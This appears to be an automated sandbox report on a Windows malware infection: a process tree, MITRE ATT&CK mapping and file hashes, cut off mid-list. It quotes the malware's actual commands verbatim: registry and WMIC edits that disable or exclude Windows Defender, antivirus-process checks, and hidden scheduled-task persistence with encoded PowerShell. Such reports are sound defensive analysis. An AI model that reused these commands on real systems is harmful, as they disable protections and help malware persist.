C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2176

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1676 -s 824
7⤵
- Loads dropped DLL
PID:760

C:\Users\Admin\Pictures\Xd5ffINUWAexJgt1ZKuSRDbx.exe
"C:\Users\Admin\Pictures\Xd5ffINUWAexJgt1ZKuSRDbx.exe" /s
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:496

C:\Users\Admin\Pictures\KcrOep5d9ZbonDmjbJKv3Q95.exe
"C:\Users\Admin\Pictures\KcrOep5d9ZbonDmjbJKv3Q95.exe"
6⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Modifies system certificate store
PID:684

C:\Users\Admin\Documents\SimpleAdobe\g5j793kwWdb5AI7JI1ot1gu7.exe
C:\Users\Admin\Documents\SimpleAdobe\g5j793kwWdb5AI7JI1ot1gu7.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3080

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
8⤵
PID:2820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
8⤵
PID:2140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
8⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
9⤵
- Creates scheduled task(s)
PID:4088

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
9⤵
- Creates scheduled task(s)
PID:1812

C:\Users\Admin\AppData\Local\Temp\spanjAZLg1qaARcu\34UkCCTcDg9lWuWQkt73.exe
"C:\Users\Admin\AppData\Local\Temp\spanjAZLg1qaARcu\34UkCCTcDg9lWuWQkt73.exe"
9⤵
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 72
10⤵
- Program crash
PID:3892

C:\Users\Admin\Pictures\UxiJhIsJOXxDEdLQAJGja5uS.exe
"C:\Users\Admin\Pictures\UxiJhIsJOXxDEdLQAJGja5uS.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2240

C:\Users\Admin\AppData\Local\Temp\7zSC9E.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2020

C:\Users\Admin\AppData\Local\Temp\7zS11CC.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
8⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
PID:340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
9⤵
PID:1032

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
10⤵
PID:3220

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
11⤵
PID:3236

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
12⤵
PID:3252

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
10⤵
PID:3392

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
11⤵
PID:3400

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
12⤵
PID:3416

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
10⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
11⤵
PID:3488

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
12⤵
PID:3496

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
10⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
11⤵
PID:3608

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
12⤵
PID:3624

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
10⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
11⤵
PID:3796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
12⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
13⤵
PID:4056

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
9⤵
PID:3996

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:3888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 07:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ekOKCbe.exe\" PP /iOndidgJPF 385118 /S" /V1 /F
9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1476

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
9⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
10⤵
PID:3764

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
11⤵
PID:3772

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3024 -s 780
5⤵
- Loads dropped DLL
PID:1680

C:\Users\Admin\AppData\Local\Temp\1000050001\9a3efc.exe
"C:\Users\Admin\AppData\Local\Temp\1000050001\9a3efc.exe"
4⤵
- Executes dropped EXE
PID:2776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Cook Cook.cmd & Cook.cmd & exit
5⤵
- Loads dropped DLL
PID:584

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
6⤵
PID:352

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
6⤵
PID:2112

C:\Windows\SysWOW64\cmd.exe
cmd /c md 563203
6⤵
PID:952

C:\Windows\SysWOW64\findstr.exe
findstr /V "DevelRespectNicoleDisclosure" Terror
6⤵
PID:1328

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Delays + Henderson 563203\O
6⤵
PID:3004

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\563203\President.pif
563203\President.pif 563203\O
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:876

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
6⤵
- Runs ping.exe
PID:1540

C:\Users\Admin\AppData\Local\Temp\1000051001\newbild.exe
"C:\Users\Admin\AppData\Local\Temp\1000051001\newbild.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
PID:996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5579758,0x7fef5579768,0x7fef5579778
3⤵
PID:344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:2
3⤵
PID:1996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:2756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:1440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:2316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2356 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:1808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2868 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:2
3⤵
PID:1272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:3092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:3204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:3228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2840 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:3236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3856 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:3844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2404 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:3544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3540 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:1
3⤵
PID:3668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3140 --field-trial-handle=1200,i,15845290655271186060,3961550090759434545,131072 /prefetch:8
3⤵
PID:3660

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\563203\President.pif
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\563203\President.pif"
2⤵
- Executes dropped EXE
PID:4036

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2980

C:\Windows\system32\taskeng.exe
taskeng.exe {0D611D99-597A-488A-A24B-EB6AEA1D0B19} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3804

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ekOKCbe.exe
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\ekOKCbe.exe PP /iOndidgJPF 385118 /S
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:3116

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:3488

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:3444

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:3964

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:2316

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1620

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2436

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:1480

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:1360

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:3032

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2844

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:748

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:2980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3824

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:3936

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvsiRmBdT" /SC once /ST 02:57:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:3404

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvsiRmBdT"
3⤵
PID:2260

C:\Windows\system32\taskeng.exe
taskeng.exe {A065AC21-0A87-455D-AFDD-2856074C60ED} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
1⤵
PID:352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2296

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2460

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b37f3a456c69678a644b195886e772ba

SHA1
edbb9062be179c4155abd17236bb0171391dcfaa

SHA256
99dc1bc172c3caffeb4b367b0a8d713bdd527ea0d7e25e0d044e9440af45c724

SHA512
638109aa9455777716e2c83cf9f9c7b4842e0074261a1e8df69c0702caaf9d683b12a6b2175e33d6ec78d5474a033256d97fa8ba4b9d405b436a41f6dd4fb9ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1f140f5b2d22a6fb8f073d0808166ae1

SHA1
d79f8f236b3d36a2ea055c0f0f9944c680929fa6

SHA256
04794c323a27c0042c054050a23b3cb9a122cce6606c3c1985310cacf834d59e

SHA512
a7bb5c5daab1ee92d2d74811de0e9a0594954e4e956afd2dd7f2fcd0e432c43398eb9bfc158c13a4afce0da125ec3db153179154a942b87733687ff4143e37b3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eef121640d4e972048f3d4b45b87f4fb

SHA1
02fe9501432cffdb6a25742cc83b8b34c68eea0e

SHA256
1026cddfbdb69fa12088d3cab1b61e2dfb96211ab9385e7692d700faa0045de5

SHA512
f1f2777762aab559fc8132a4b766f8399d3ffc24d1a65fae0c122293ec569240b175474e58a94504192f83a9776e50141d08293f56f35b82b27d5cbb3865aa61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
